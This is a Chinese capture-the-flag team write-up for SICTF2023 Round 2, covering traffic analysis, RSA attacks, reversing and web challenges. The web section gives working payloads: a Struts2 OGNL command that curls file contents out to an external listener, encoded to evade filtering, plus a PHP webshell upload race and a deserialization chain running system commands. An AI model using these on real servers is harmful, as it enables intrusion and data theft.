SICTF2023 Round2

SICTF2023 #Round2 是杭州电子科技大学信息工程学院和广东海洋大学联合举办的网络安全赛。

Rank: 4


MISC

[签到]Welcome

SICTF{Welcome_to_SICTF2023_#Round2}

Pixel_art

LSB隐写:zsteg -E "b1,rgb,lsb,xy" Pixel_art.png > 1.png

提取RGB值:

1
2
3
4
5
6
7
8
9
10
11
12
from PIL import Image
img = Image.open('1.png')
width , height = img.size
f = b''
for i in range(0,height):
for j in range(0,width):
tmp = img.getpixel((j,i))
f+=bytes(list(tmp))

print(f)

# b'..................!?!!.?..................?.?!.?....!.?.......!?!!.?!!!!!!?.?!.?!!!.!!!!!!!!!!!!!.?.........!?!!.?........?.?!.?..!.?.......!?!!.?!!!!!!?.?!.?!!!!!!!!!!!.?...............!?!!.?..............?.?!.?........!.?.................!?!!.?!!!!!!!!!!!!!!!!?.?!.?!!!!!!!!!!!!!!!!!!!!!!!...!.......!.!!!!!!!.?.............!?!!.?............?.?!.?........................!.....!.?.............!?!!.?!!!!!!!!!!!!?.?!.?!!!!!!!!!!!!!!!!!!!!!!!!!.....!.!!!!!!!!!!!!!!!!!.?...............!?!!.?..............?.?!.?..............!.!!!!!.?...............!?!!.?!!!!!!!!!!!!!!?.?!.?!!!.................!.?.......!?!!.?!!!!!!?.?!.?!!!!!!!...............!.?.............!?!!.?............?.?!.?......................!.....!.!.?...............!?!!.?!!!!!!!!!!!!!!?.?!.?!!!!!!!!!!!!!!!.?...............!?!!.?..............?.?!.?......!.?.............!?!!.?!!!!!!!!!!!!?.?!.?!!!!!!!!!.!!!!!!!!!!!!!!!!!!!.............!.!!!!!!!!!!!!!!!!!!!...........!.!.............!.!!!!!!!!!!!!!!!!!...........!.?...............!?!!.?..............?.?!.?!.!!!!!.!!!!!.......!.!!!.?.............!?!!.?!!!!!!!!!!!!?.?!.?!!!!!!!!!!!!!!!!!!!.!.?.................!?!!.?................?.?!.?............!.?.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'

在线ook解码,得flag:SICTF{0141ac35-ec19-4cee-a906-22805fdbed77}

一起上号不

Cobalt Strike流量分析,参考:https://blog.scrt.ch/2023/04/01/hex-filtrate/

提取出最后一个流里的key,解析cookie:

python3 cs-decrypt-metadata.py U8jm3+oqzYLuUiRd9F3s7xVz7fGnHQYIKF9ch6GRseWfcBSSk+aGhWP3ZUyHIkwRo1/oDCcKV7LYAp022rCm9bC7niOgMlsvgLRolMKIz+Eq5hCyQ0QVScH8jDYsJsCyVw1iaTf5a7gHixIDrSbTp/GiPQIwcTNZBXIJrll540s= -f key

拿到Raw key后,再分析流量文件:

python3 cs-parse-traffic.py -r 1ddb06c55884caf491bdb370ca48389c 11.pcapng

得到flag:SICTF{88a39373-e204-43b6-b321-33ac8972fde9}

baby_zip

部分明文攻击,1.png 为png图片前18字节:

rbkcrack -C flag.zip -c flag.png -p 1.png

得到key后再提取:

rbkcrack -C flag.zip -c flag.png -k 6424c164 7c334afd f99666e5 -d flag.png

flag:SICTF{3a4998b8-345e-4943-a689-d01e8b08defb}

还不上号

flag1.pcapng是冰蝎流量,flag2.pcapng是CS流量。

先看flag2.pcapng,提取 key.zip 解压,key 中有零宽字符隐写,得到 cd52f1488563bf0e,是冰蝎流量的key。

flag1.pcapng中,参考Easy_Shark解密代码:

1
2
3
4
5
6
<?php
$key="cd52f1488563bf0e";
$post="...";
$post=openssl_decrypt($post, "AES128", $key);
print_r(base64_decode(json_decode($post, true)['msg']));
?>

将响应数据包中的base64字符串带入得到各流的解密内容:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
# 流2
dvwa_email.png
flag.txt
key
shell.php

# 流4
SICTF{79e1755e-08a8-4d

# 流6
rO0ABXNyABRzbGVlcC5ydW50aW1lLlNjYWxhcryvNaxLcOBGAwADTAAFYXJyYXl0ABtMc2xlZXAv
cnVudGltZS9TY2FsYXJBcnJheTtMAARoYXNodAAaTHNsZWVwL3J1bnRpbWUvU2NhbGFySGFzaDtM
AAV2YWx1ZXQAGkxzbGVlcC9ydW50aW1lL1NjYWxhclR5cGU7eHBzcgAec2xlZXAuZW5naW5lLnR5
cGVzLk9iamVjdFZhbHVluXko22Ba54kCAAFMAAV2YWx1ZXQAEkxqYXZhL2xhbmcvT2JqZWN0O3hw
c3IAFWphdmEuc2VjdXJpdHkuS2V5UGFpcpcDDDrSzRKTAgACTAAKcHJpdmF0ZUtleXQAGkxqYXZh
L3NlY3VyaXR5L1ByaXZhdGVLZXk7TAAJcHVibGljS2V5dAAZTGphdmEvc2VjdXJpdHkvUHVibGlj
S2V5O3hwc3IAFGphdmEuc2VjdXJpdHkuS2V5UmVwvflPs4iapUMCAARMAAlhbGdvcml0aG10ABJM
amF2YS9sYW5nL1N0cmluZztbAAdlbmNvZGVkdAACW0JMAAZmb3JtYXRxAH4ADUwABHR5cGV0ABtM
amF2YS9zZWN1cml0eS9LZXlSZXAkVHlwZTt4cHQAA1JTQXVyAAJbQqzzF/gGCFTgAgAAeHAAAAJ6
MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBAL0M6FR0Cb9dW52Nd5NTA1JUNAs1
thS8iXx6QB+UkN/vRJdfsKS8dnOfNuPuPDCtx26B2j8I1FuTJ1VrrfDkzN585sskmXYronFM98Dx
50vHaadOcDcDdBBqi8gC5/D3iKflX6T9pSL/5PVLfN1EIaFsyAS9jpWX2wGNi3C/QPSrAgMBAAEC
gYAdNhXeGtH4wkWqOhY8aurL+VvTUZjRanJ6C+/FkXCzUWbRVwVV5xMMeZEDNigRw4BZ2HGvJL+f
aMT+o3VMkCYBhGbi2/3RPRgigMG7Aa3LWWtYWsdbw8Mw6aqqbTjDUHrQ1kulMf1JvXJL5LBd+pBA
Q8kHaYJRMcmnLsT4NeXOFQJBAMNa2r+phrThTlagMB6bj6vl0IVbDy+TJT2VybCSJ76rPgVUQwtP
yX3z7UAjt27mE8KK+k7Jidi0drCEPv5Wo60CQQD3vQbO64fko1dlatkNn095GO9KoCuanrsLs+vY
Ohc0ltk4EhHHmP5hEE6dSMZNASKaN0wSYJ14xjnA+dJWOES3AkEApzyYF4vhLefTUIVBrHIvxFCw
+fjCP1AQiXA5gVcdfzTJm3ZPDtf2/kRbzpTE68M7F0gykFAoGcQj92i/JKy24QJAdyVbA+M07Ro9
qxHzJ+EJmMUMOMjFj8xtStiSQeDWTj2KZLQUBvmmxcnQ9UYN0PUNzjtwA5qhwXccSZoctcjECwJA
Zc0TZgGq/OwgnIyj/1+Q9D0A2eg3aw1k+6Vzkf/DdkuF6+XTkYTlBGiETIK/vm1rCH4NcOCL7eK5
qpA1grg+gnQABlBLQ1MjOH5yABlqYXZhLnNlY3VyaXR5LktleVJlcCRUeXBlAAAAAAAAAAASAAB4
cgAOamF2YS5sYW5nLkVudW0AAAAAAAAAABIAAHhwdAAHUFJJVkFURXNxAH4ADHEAfgARdXEAfgAS
AAAAojCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAvQzoVHQJv11bnY13k1MDUlQ0CzW2FLyJ
fHpAH5SQ3+9El1+wpLx2c5824+48MK3HboHaPwjUW5MnVWut8OTM3nzmyySZdiuicUz3wPHnS8dp
p05wNwN0EGqLyALn8PeIp+VfpP2lIv/k9Ut83UQhoWzIBL2OlZfbAY2LcL9A9KsCAwEAAXQABVgu
NTA5fnEAfgAVdAAGUFVCTElDcHB4

将流6保存,为flag2.pcapng的实际key。

回到flag2.pcapng,解析cookie:

python3 cs-decrypt-metadata.py j+ojKDVPlCr7lT9yzNinkj1DgdkcRaLMT2kL4U+9TvdFBZqGKk7/4WF/W7JhEieC3DoRfngRppMAVHa3yfhp4HZm/ZeNY4bc8rlYL11Q0dXDzpR5JjhqN+hGe9RBqPznoukShgQLhxT/DO7djxE5ROzi6NC52yZAaGPCSeLDyjg= -f realkey

拿到Raw key后,再分析流量文件:

python3 cs-parse-traffic.py -r dfc36399da501802482005cf8c768086 flag2.pcapng

得到关键内容:

F 0 09/06/2023 15:52:58 GNSC2OJTHA2S2NDDGA2TIMJVGQ4TSOJVPU======

base32解码得后半部分flag:3d-9385-4c0541549995}

flag:SICTF{79e1755e-08a8-4d3d-9385-4c0541549995}

Easy_Shark

冰蝎流量,照着第一个流的PHP加密逻辑代码还原:

1
2
3
4
5
6
<?php
$key="2295d22e2d70888f";
$post="...";
$post=openssl_decrypt($post, "AES128", $key);
print_r(base64_decode(json_decode($post, true)['msg']));
?>

将响应数据包中的base64字符串带入得到各流的解密内容:

1
2
3
4
5
6
7
8
9
10
GronKey.txt
dvwa_email.png
flag.txt
shell.php

# flag.txt
TGLBOMSJNSRAJAZDEZXGHSJNZWHG

# GronKey.txt
1,50,61,8,9,20,63,41

Gronsfeld加密,替换成Vigenere加密:

1
2
3
4
5
6
7
8
9
s = [1,50,61,8,9,20,63,41]
import string
dic = string.ascii_lowercase
key = ''
for k in s:
key += dic[k%26]
print(key)

# byjijulp

Vigenere解密,得 SICTFSHUMUISAGOODBOYYYYYYYYY

flag:SICTF{SHUMUISAGOODBOYYYYYYYYY}

fast_morse

audacity调慢速度,再在线识别morse,得到 f2a09bf-7f4a-4269-93a5-c8a48360b03c

QR_QR_QR

交互式01字符串还原二维码,且搞了1000层…

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from pwn import *
from PIL import Image
from pyzbar.pyzbar import decode

r = remote('210.44.151.51',10144)

for i in range(1000):
print(i)
x = r.recvuntil(b'Please')[:-7].split(b'\n')

MAX = len(x)
pic = Image.new("RGB",(MAX,MAX))
s = b''.join(x)
i = 0
for y in range(0,MAX):
for x in range(0,MAX):
if(s[i] == ord('0')):
pic.putpixel((x,y),(0,0,0))
else:
pic.putpixel((x,y),(255,255,255))
i = i+1
pic.save("flag.png")

decocdeQR = decode(Image.open("flag.png"))
data = decocdeQR[0].data
print(data)

r.sendlineafter(b'code:',data)
print(r.recvline())

r.interactive()

问卷调查

SICTF{SICTF_Round3_will_do_even_better!}

CRYPTO

[签到]古典大杂烩

base100-base62-base64-base58-base32-base62

SICTF{fe853b49-8730-462e-86f5-fc8e9789f077}

Radio

CRT

1
2
3
4
5
6
7
8
9
10
11
12
13
n1 =   
n2 =
n3 =
c1 =
c2 =
c3 =
e = 17

mm = crt([c1,c2,c3],[n1,n2,n3])
m = mm.nth_root(e, truncate_mode=True)
print(bytes.fromhex(hex(m[0])[2:]))

# b'SICTF{fdc0afb5-1c81-46b9-a28a-241f5f64419d}'

MingTianPao

MTP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
import Crypto.Util.strxor as xo
import libnum, codecs, numpy as np

def isChr(x):
if ord('a') <= x and x <= ord('z'): return True
if ord('A') <= x and x <= ord('Z'): return True
return False


def infer(index, pos):
if msg[index, pos] != 0:
return
msg[index, pos] = ord(' ')
for x in range(len(c)):
if x != index:
msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(' ')

def know(index, pos, ch):
msg[index, pos] = ord(ch)
for x in range(len(c)):
if x != index:
msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(ch)


dat = []

def getSpace():
for index, x in enumerate(c):
res = [xo.strxor(x, y) for y in c if x!=y]
f = lambda pos: len(list(filter(isChr, [s[pos] for s in res])))
cnt = [f(pos) for pos in range(len(x))]
for pos in range(len(x)):
dat.append((f(pos), index, pos))

c = [codecs.decode(x.strip().encode(), 'hex') for x in open('Problem.txt', 'r').readlines()]

msg = np.zeros([len(c), len(c[0])], dtype=int)

getSpace()

dat = sorted(dat)[::-1]
for w, index, pos in dat:
infer(index, pos)

know(1, 28, 'a')
know(1, 24, 'e')
know(1, 16, 't')
know(0, 10, ' ')
know(0, 12, 'i')

print('\n'.join([''.join([chr(c) for c in x]) for x in msg]))

key = xo.strxor(c[0], ''.join([chr(c) for c in msg[0]]).encode())
print(key)

# Little Red Riding Hood promise
# d to obey her mother. The gran
# dmother lived out in the woods
# , a half hour from the village
# . When Little Red Riding Hood
# entered the woods a wolf came
# up to her. She did not know wh
# at a wicked animal he was, and
# was not afraid of him. "Good
# day to you, Little Red Riding
# b'SICTF{MTP_AtTack_is_w0nderFu1}'

Easy_CopperSmith

coppersmith解已知p高位攻击。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
n = 
c =
ph =
e = 65537
PR.<x> = PolynomialRing(Zmod(n))
f = (ph << 230) + x
pl = f.small_roots(X=2^230, beta=0.48, epsilon=0.02)[0]
p = (ph << 230) + pl

q = n//int(p)
f = (p-1)*(q-1)
d = inverse_mod(e,f)
m = pow(c,d,n)
print(bytes.fromhex(hex(m)[2:]))

# b'SICTF{3f9366ed-b8e4-412f-bbd0-62616a24115c}'

签到题来咯!

Related Message Attack(Franklin-Reiter攻击),爆破小 $e$。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
n = 
c1 =
c2 =

import binascii

def attack(c1, c2, n, e):
PR.<x>=PolynomialRing(Zmod(n))
g1 = (114*x+2333)^e - c1
g2 = (514*x+4555)^e - c2

def gcd(g1, g2):
while g2:
g1, g2 = g2, g1 % g2
return g1.monic()
return -gcd(g1, g2)[0]

e = 2
while e < 2^10:
m = attack(c1, c2, n, e)
m = binascii.unhexlify("%x" % int(m))
if m.isascii():
print(m)
break
e = next_prime(e)

# SICTF{hhh!!franklin_reiter_is_easy}

small_e

直接小 $e$ 攻击

1
2
3
4
5
6
7
import gmpy2
e = 3
c =
m = gmpy2.iroot(c,3)[0]
print(bytes.fromhex(hex(m)[2:]))

# b'SICTF{2ca8e589-4a31-4909-80f0-9ecfc8f8cb37}'

easy_math

根据

$\begin{cases} h_1=a_1p+b_1q \newline h_2=a_2p+b_2q \end{cases}$

消掉 $p$,有 $(a_2b_1-a_1b_2)q=a_2h_1-a_1h_2$,由于 $a_1,a_2$ 为素数且 $a_1,a_2 \in [2^{12},2^{13})$,又 $\gcd(a_2h_1-a_1h_2,n)=q$,爆破 $a_1,a_2$ 即可求 $q$。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
n = 
h1 =
h2 =
c =

primes = []
for k in Primes():
if k>=2^12:
primes.append(k)
if k>2^13:
break

for i in range(len(primes)):
for j in range(len(primes)):
x = abs(h1*primes[i]-h2*primes[j])
q = gcd(x,n)
if q > 1:
print(primes[i],primes[j],q)

# 5953 4241 8358483529150257619757085065272214074629139403939506404958882156637928949429486966229697771519458532207667137987443291952917150640467328461391364839768437

常规解RSA,得flag:SICTF{452aebb6-9c16-441a-ac42-fc608bf6063f}

WEB

[签到]Include

PHP伪协议读 /flag

?SICTF=php://filter/resource=/flag

Baby_PHP

POST /?k%20e%20y=123%0a&b=phpinfo();

command=print_r(file_get_contents(array_rand(array_flip(scandir(current(localeconv()))))));

你能跟得上我的speed吗

条件竞争。

上传 1.php ,内容为 <?php system("cat /flag");,bp抓包;访问 uploads/1.php ,bp抓包。

上面两个包分别在bp intruder用null payloads爆破1000次,找到 uploads/1.php 爆破结果中响应码200的那个数据包,即为flag值。

pain

Struts2基于OGNL的RCE漏洞,参考https://www.freebuf.com/vuls/217482.html

S2-012的payload可用:

1
(new java.lang.ProcessBuilder(new java.lang.String[]{"bash", "-c", "curl http://[IP]:[PORT]/?p=`cat /flag`"})).start()

unicode编码绕过黑名单关键字过滤,再根据源码的urldecode,urlencode一层,payload:

/start?payload=%5Cu0028%5Cu006e%5Cu0065%5Cu0077%5Cu0020%5Cu006a%5Cu0061%5Cu0076%5Cu0061%5Cu002e%5Cu006c%5Cu0061%5Cu006e%5Cu0067%5Cu002e%5Cu0050%5Cu0072%5Cu006f%5Cu0063%5Cu0065%5Cu0073%5Cu0073%5Cu0042%5Cu0075%5Cu0069%5Cu006c%5Cu0064%5Cu0065%5Cu0072%5Cu0028%5Cu006e%5Cu0065%5Cu0077%5Cu0020%5Cu006a%5Cu0061%5Cu0076%5Cu0061%5Cu002e%5Cu006c%5Cu0061%5Cu006e%5Cu0067%5Cu002e%5Cu0053%5Cu0074%5Cu0072%5Cu0069%5Cu006e%5Cu0067%5Cu005b%5Cu005d%5Cu007b%5Cu0022%5Cu0062%5Cu0061%5Cu0073%5Cu0068%5Cu0022%5Cu002c%5Cu0020%5Cu0022%5Cu002d%5Cu0063%5Cu0022%5Cu002c%5Cu0020%5Cu0022%5Cu0063%5Cu0075%5Cu0072%5Cu006c%5Cu0020%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003a%5Cu002f%5Cu002f%5Cu0031%5Cu0032%5Cu0030%5Cu002e%5Cu0032%5Cu0035%5Cu002e%5Cu0031%5Cu0030%5Cu0034%5Cu002e%5Cu0032%5Cu0030%5Cu0039%5Cu003a%5Cu0038%5Cu0038%5Cu0038%5Cu0038%5Cu002f%5Cu003f%5Cu0070%5Cu003d%5Cu0060%5Cu0063%5Cu0061%5Cu0074%5Cu0020%5Cu002f%5Cu0066%5Cu006c%5Cu0061%5Cu0067%5Cu0060%5Cu0022%5Cu007d%5Cu0029%5Cu0029%5Cu002e%5Cu0073%5Cu0074%5Cu0061%5Cu0072%5Cu0074%5Cu0028%5Cu0029

得到结果:

210.44.151.51 - - [09/Sep/2023 12:30:07] "GET /?p=SICTF169e8299-2241-4b2e-9726-1c32f212ca51 HTTP/1.1" 200 -

RCE

POST /

code=include "/flag";

我全都要

写反序列化链:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from phpserialize import serialize

class P:
public_MyLover='x'

class B:
public_i='1'
public_nogame=P()

class A:
public_Aec=B()
public_girl=['1']
public_boy=['2']

class B:
public_pop=A()

print(serialize(B()))

# O:1:"B":1:{s:3:"pop";O:1:"A":3:{s:3:"Aec";O:1:"B":2:{s:1:"i";s:1:"1";s:6:"nogame";O:1:"P":1:{s:7:"MyLover";s:1:"x";}}s:3:"boy";a:1:{i:0;s:1:"2";}s:4:"girl";a:1:{i:0;s:1:"1";}}}

POST ?A_B_C=O:1:"B":1:{s:3:"pop";O:1:"A":3:{s:3:"Aec";O:1:"B":2:{s:1:"i";s:1:"1";s:6:"nogame";O:1:"P":1:{s:7:"MyLover";s:1:"x";}}s:3:"boy";a:1:{i:0;s:1:"2";}s:4:"girl";a:1:{i:0;s:1:"1";}}}

cmd=system("cat /flag");

REVERSE

[签到]PYC

pyc反编译,得flag。

SICTF{07e278e7-9d66-4d90-88fc-8bd61e490616}

Myobject

动调,发现是RC4,key为 SIFLAG,密文为 3027D30E5A22CF47476B0BE58D53BA99C3850707011C7710FE889F

解密RC4,得flag:SICTF{wow_you_get_the_flag}

chbase

搜索字符串得

码表:ZYXWVUTSRQPONMLKJIHGFEDCBAabcdefghijklmnopqrstuvwxyz0123456789+/

密文:F0lWEVA7BmUzAGB0C2UuAU9hbnIpATEidDdnACQ9

base64解码得flag:SICTF{base64_and_antidebugger}

不一样的base64

pyinstxtractor解包得到111.pyc,反编译得到:

U0lDVEZ7OGUwZDM1OGQtOGI5ZC00ODY2LTliMDItNjc0OWIwN2FkMDlhfQAA

base64解码得flag:SICTF{8e0d358d-8b9d-4866-9b02-6749b07ad09a}

javacode

JVM字节码,参考 两张图让你快速读懂JVM字节码指令 理加密逻辑,已知key和密文c,关键运算为:

c[i] = (((m[i]^m[i+1])-k[i])^k[i])%256

还原:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
c = [148,136,151,234,177,48,226,234,214,177,168,176,151,250,19,20,253,52,72,176,170,140,176,236,54,231,212,237,135,151,150,135,217,231,229,32,90]
k = list(b'SICTF2023')

import string
dic = string.ascii_letters+string.digits+'_{}'

m = [83]

for i in range(len(c)):
for j in range(33,127):
if (((m[-1]^j)-k[i%len(k)])^k[i%len(k)])%256 == c[i]:
m.append(j)
break

print(bytes(m))

# b'SICTF{OMG_j@vac0de_1s_sO_interesting!}'

PWN

[签到]Shop

整数溢出漏洞,输入-1得flag。

FORENSICS

购物之旅

百度识图+关键字搜索。

SICTF{北京市_顺义区_新顺南大街_北京华联顺义金街购物中心}

天桥

辨认出梧桐树,再关键字搜索城市。

SICTF{陕西省西安市碑林区友谊路}

美女姐姐O.o

百度识图+关键字搜索。

SICTF{福建省福州市仓山区烟台山公园}

宝塔镇河妖

百度识图+关键字搜索。

SICTF{山东省济宁市汶上县太子灵踪塔}